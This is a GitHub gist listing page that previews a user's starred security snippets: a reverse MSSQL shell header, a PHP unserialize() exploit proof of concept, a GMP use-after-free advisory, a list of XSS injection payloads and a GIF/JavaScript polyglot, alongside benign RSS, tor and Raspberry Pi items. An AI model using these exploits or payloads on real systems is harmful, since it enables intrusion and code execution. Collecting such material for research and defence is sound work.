Skip to content

Instantly share code, notes, and snippets.

View santaklouse's full-sized avatar

Alex santaklouse

34 followers · 30 following
View GitHub Profile
@xassiz
xassiz / mandros.py
Created March 16, 2018 07:53
Reverse MSSQL shell
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''
@FrankSpierings
FrankSpierings / README.md
Last active November 4, 2025 21:29
Linux Container Escapes and Hardening
@allyshka
allyshka / test.php
Created February 11, 2017 18:10
PHP <= 5.6.11 DateInterval + GMP unserialize() object change exploit
<?php
$a = new stdClass; // handle = 1
$a->test = false;
echo('Property $a->test is: ');
var_dump($a->test);
$b = unserialize('a:1:{i:0;C:3:"GMP":69:{s:1:"1";a:2:{s:4:"test";b:1;i:0;O:12:"DateInterval":1:{s:1:"y";R:2;}}}}');
echo('Property $a->test changed to: ');
var_dump($a->test);
@carter-yagemann
carter-yagemann / phrack-rss.py
Created January 13, 2017 17:48
Phrack RSS
"""
phrack-rss.py - Generates a RSS feed for Phrack's releases.
Copyright (c) 2016 Carter Yagemann
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
@gtank
gtank / tor.service
Created May 17, 2016 18:55
$ cat /usr/lib/systemd/system/tor.service
[Unit]
Description=Anonymizing overlay network for TCP
After=syslog.target network.target nss-lookup.target
PartOf=tor-master.service
ReloadPropagatedFrom=tor-master.service
[Service]
Type=notify
NotifyAccess=all
@ripper
ripper / sshd_tunnel.sh
Last active June 27, 2023 16:09
A script to launch user sshd limited to creation of reverse tunnels
#!/bin/sh
AUTHORIZED_KEYS=authorized_keys
HOST_RSA_KEY=ssh_host_rsa_key
SSHD=/usr/sbin/sshd
PORT=8443
case "$AUTHORIZED_KEYS" in /*) ;; *) AUTHORIZED_KEYS=$PWD/$AUTHORIZED_KEYS ;; esac
case "$HOST_RSA_KEY" in /*) ;; *) HOST_RSA_KEY=$PWD/$HOST_RSA_KEY ;; esac
@gbaman
gbaman / HowToOTG.md
Last active January 21, 2026 00:59
Simple guide for setting up OTG modes on the Raspberry Pi Zero

Raspberry Pi Zero OTG Mode

Simple guide for setting up OTG modes on the Raspberry Pi Zero - By Andrew Mulholland (gbaman).

The Raspberry Pi Zero (and model A and A+) support USB On The Go, given the processor is connected directly to the USB port, unlike on the B, B+ or Pi 2 B, which goes via a USB hub.
Because of this, if setup to, the Pi can act as a USB slave instead, providing virtual serial (a terminal), virtual ethernet, virtual mass storage device (pendrive) or even other virtual devices like HID, MIDI, or act as a virtual webcam!
It is important to note that, although the model A and A+ can support being a USB slave, they are missing the ID pin (is tied to ground internally) so are unable to dynamically switch between USB master/slave mode. As such, they default to USB master mode. There is no easy way to change this right now.
It is also important to note, that a USB to UART serial adapter is not needed for any of these guides, as may be documented elsewhere across the int

@chtg
chtg / .md
Created August 26, 2015 11:04
Use After Free Vulnerability in unserialize() with GMP

#Use After Free Vulnerability in unserialize() with GMP

Taoguang Chen <@chtg> - Write Date: 2015.8.17 - Release Date: 2015.9.4

A use-after-free vulnerability was discovered in unserialize() with GMP object's deserialization that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.

Affected Versions

Affected is PHP 5.6 < 5.6.13

@xsscx
xsscx / XSS, Cross Site Scripting, Javascript, Meta, HTML Injection Signatures
Last active November 30, 2025 09:59
XSS, Cross Site Scripting, Javascript, Meta, HTML Injection Signatures
/* Remote File Include with HTML TAGS via XSS.Cx */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-javascript-injection-signatures-only-fools-dont-use.txt */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-http-header-injection-signatures-only-fools-dont-use.txt */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-css-injection-signatures-only-fools-dont-use.txt */
/* Updated September 29, 2014 */
/* RFI START */
<img language=vbs src=<b onerror=alert#1/1#>
<isindex action="javas&Tab;cript:alert(1)" type=image>
"]<img src=1 onerror=alert(1)>
<input/type="image"/value=""`<span/onmouseover='confirm(1)'>X`</span>
@fdaciuk
fdaciuk / gifjs.asm
Last active January 30, 2020 11:28 — forked from ajinabraham/gifjs.asm
; a hand-made GIF containing valid JavaScript code
; abusing header to start a JavaScript comment
; inspired by Saumil Shah's Deadly Pixels presentation
; Ange Albertini, BSD Licence 2013
; yamal gifjs.asm -o img.gif
WIDTH equ 10799 ; equivalent to 2f2a, which is '/*' in ASCII, thus starting an opening comment